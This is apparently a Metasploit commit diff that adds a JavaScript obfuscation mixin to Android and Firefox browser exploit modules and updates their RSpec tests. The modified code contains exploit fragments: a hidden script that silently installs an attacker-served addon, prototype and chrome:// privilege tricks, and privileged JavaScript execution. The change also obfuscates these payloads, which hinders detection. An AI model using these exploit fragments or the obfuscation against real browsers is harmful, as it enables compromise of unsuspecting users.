Add the JSObfu mixin to a lot of places.

Author: jvennix-r7

lib/msf/core/exploit/android.rb

@@ -1,9 +1,12 @@
 # -*- coding: binary -*-
 require 'msf/core'
+require 'msf/core/exploit/jsobfu'
 
 module Msf
 module Exploit::Android
 
+  include Msf::Exploit::JSObfu
+
   # Since the NDK stager is used, arch detection must be performed
   SUPPORTED_ARCHES = [ ARCH_ARMLE, ARCH_MIPSLE, ARCH_X86 ]
 
@@ -20,7 +23,7 @@ module Exploit::Android
 
   def add_javascript_interface_exploit_js(arch)
     stagename = Rex::Text.rand_text_alpha(5)
-    script = %Q|
+    js_obfuscate %Q|
       function exec(runtime, cmdArr) {
         var ch = 0;
         var output = '';
@@ -84,9 +87,6 @@ def add_javascript_interface_exploit_js(arch)
 
       for (i in top) { if (attemptExploit(top[i]) === true) break; }
     |
-
-    # remove comments and empty lines
-    script.gsub(/\/\/.*$/, '').gsub(/^\s*$/, '')
   end
 
 

lib/msf/core/exploit/remote/firefox_privilege_escalation.rb

@@ -7,16 +7,23 @@
 #
 ###
 
+require 'msf/core/exploit/jsobfu'
+
 module Msf
 module Exploit::Remote::FirefoxPrivilegeEscalation
 
+  include Msf::Exploit::JSObfu
+
   # Sends the +js+ code to the remote session, which executes it in Firefox's
-  # privileged javascript context
+  # privileged javascript context. The code will be obfuscated if the JsObfuscate
+  # datastore option is set to 1 or higher.
+  #
   # @return [String] the results that were sent back. This can be achieved through
   #   calling the "send" function, or by just returning the value in +js+
   def js_exec(js, timeout=30)
     print_status "Running the privileged javascript..."
     token = "[[#{Rex::Text.rand_text_alpha(8)}]]"
+    js = js_obfuscate(js)
     session.shell_write("#{token}[JAVASCRIPT]#{js}[/JAVASCRIPT]#{token}")
     session.shell_read_until_token("[!JAVASCRIPT]", 0, timeout)
   end

modules/exploits/multi/browser/firefox_proto_crmfrequest.rb

@@ -79,21 +79,7 @@ def generate_html(target_info)
       "p2.constructor.defineProperty(obj,key,{get:runme});"
     end
 
-    %Q|
-      <html>
-      <body>
-      #{datastore['CONTENT']}
-      <div id='payload' style='display:none'>
-      if (!window.done) {
-        window.AddonManager.getInstallForURL(
-          '#{get_module_uri}/addon.xpi',
-          function(install) { install.install() },
-          'application/x-xpinstall'
-        );
-        window.done = true;
-      }
-      </div>
-      <script>
+    script = js_obfuscate %Q|
       try{InstallTrigger.install(0)}catch(e){p=e;};
       var p2=Object.getPrototypeOf(Object.getPrototypeOf(p));
       p2.__exposedProps__={
@@ -116,6 +102,28 @@ def generate_html(target_info)
       };
       for (var i in window) register(window, i);
       for (var i in document) register(document, i);
+    |
+
+    js_payload = js_obfuscate %Q|
+      if (!window.done) {
+        window.AddonManager.getInstallForURL(
+          '#{get_module_uri}/addon.xpi',
+          function(install) { install.install() },
+          'application/x-xpinstall'
+        );
+        window.done = true;
+      }
+    |
+
+    %Q|
+      <html>
+      <body>
+      #{datastore['CONTENT']}
+      <div id='payload' style='display:none'>
+        #{js_payload}
+      </div>
+      <script>
+        #{script}
       </script>
       </body>
       </html>

modules/exploits/multi/browser/firefox_svg_plugin.rb

@@ -129,24 +129,7 @@ def generate_html(cli, target)
       :loader_path      => "#{get_module_uri}.swf",
       :content          => self.datastore['CONTENT'] || ''
     }
-    %Q|
-      <!doctype html>
-      <html>
-      <head>
-        <base href="chrome://browser/content/">
-      </head>
-      <body>
-
-      <svg style='position: absolute;top:-500px;left:-500px;width:1px;height:1px'>
-        <symbol id="#{vars[:symbol_id]}">
-          <foreignObject>
-            <object></object>
-          </foreignObject>
-        </symbol>
-        <use />
-      </svg>
-
-      <script>
+    script = js_obfuscate %Q|
       var #{vars[:payload_obj_var]} = #{JSON.unparse({vars[:payload_key] => vars[:payload]})};
       var #{vars[:payload_var]} = #{vars[:payload_obj_var]}['#{vars[:payload_key]}'];
       function $() {
@@ -169,6 +152,27 @@ def generate_html(cli, target)
       document.querySelector('use').setAttributeNS(
         "http://www.w3.org/1999/xlink", "href", location.href + "##{vars[:symbol_id]}"
       );
+    |
+
+    %Q|
+      <!doctype html>
+      <html>
+      <head>
+        <base href="chrome://browser/content/">
+      </head>
+      <body>
+
+      <svg style='position: absolute;top:-500px;left:-500px;width:1px;height:1px'>
+        <symbol id="#{vars[:symbol_id]}">
+          <foreignObject>
+            <object></object>
+          </foreignObject>
+        </symbol>
+        <use />
+      </svg>
+
+      <script>
+      #{script}
       </script>
 
       <iframe style="position:absolute;top:-500px;left:-500px;width:1px;height:1px"

modules/exploits/multi/browser/firefox_tostring_console_injection.rb

@@ -74,7 +74,7 @@ def generate_html(target_info)
     key = Rex::Text.rand_text_alpha(5 + rand(12))
     opts = { key => run_payload } # defined in FirefoxPrivilegeEscalation mixin
 
-    js = Rex::Exploitation::JSObfu.new(%Q|
+    js = js_obfuscate %Q|
       var opts = #{JSON.unparse(opts)};
       var key = opts['#{key}'];
       var y = {}, q = false;
@@ -85,9 +85,7 @@ def generate_html(target_info)
         return 5;
       };
       console.time(y);
-    |)
-
-    js.obfuscate
+    |
 
     %Q|
       <!doctype html>

modules/exploits/multi/browser/firefox_webidl_injection.rb

@@ -79,7 +79,7 @@ def generate_html(target_info)
                "{},function(){top.vvv=window.open('chrome://browser/content/browser.xul', "+
                "'#{r}', 'chrome,top=-9999px,left=-9999px,height=100px,width=100px');})<\/script>"
 
-    js = Rex::Exploitation::JSObfu.new(%Q|
+    js = js_obfuscate %Q|
       var opts = #{JSON.unparse(opts)};
       var key = opts['#{key}'];
 
@@ -127,10 +127,7 @@ def generate_html(target_info)
           setTimeout(function(){top.vvv.close();}, 100);
         }, 10);
       }
-
-    |)
-
-    js.obfuscate
+    |
 
     %Q|
       <!doctype html>

spec/lib/msf/core/exploit/android_spec.rb

@@ -0,0 +1,8 @@
+require 'spec_helper'
+require 'msf/core'
+
+describe Msf::Exploit::Android do
+
+  it_should_behave_like 'Msf::Exploit::JSObfu'
+
+end

spec/lib/msf/core/exploit/remote/browser_exploit_server_spec.rb

@@ -1,6 +1,5 @@
 require 'spec_helper'
 require 'msf/core'
-require 'msf/core/exploit/remote/browser_exploit_server'
 
 describe Msf::Exploit::Remote::BrowserExploitServer do
 
@@ -58,6 +57,8 @@
     server.start_service
   end
 
+  it_should_behave_like 'Msf::Exploit::JSObfu'
+
   describe "#get_module_resource" do
     it "should give me a URI to access the exploit page" do
       module_resource = server.get_module_resource

spec/lib/msf/core/exploit/remote/firefox_privilege_escalation_spec.rb

@@ -0,0 +1,8 @@
+require 'spec_helper'
+require 'msf/core'
+
+describe Msf::Exploit::Remote::FirefoxPrivilegeEscalation do
+
+  it_should_behave_like 'Msf::Exploit::JSObfu'
+
+end

spec/lib/msf/core/exploit/jsobfu_spec.rb renamed to spec/support/shared/examples/msf/core/exploit/jsobfu.rb

@@ -3,11 +3,11 @@
 require 'msf/core/exploit/jsobfu'
 
 
-describe Msf::Exploit::JSObfu do
+shared_examples_for 'Msf::Exploit::JSObfu' do
+
   subject(:jsobfu) do
     mod = ::Msf::Module.new
     mod.extend described_class
-    mod.send(:initialize, {})
     mod
   end
 
@@ -58,4 +58,5 @@
       expect(obj.to_s).to include(js)
     end
   end
+
 end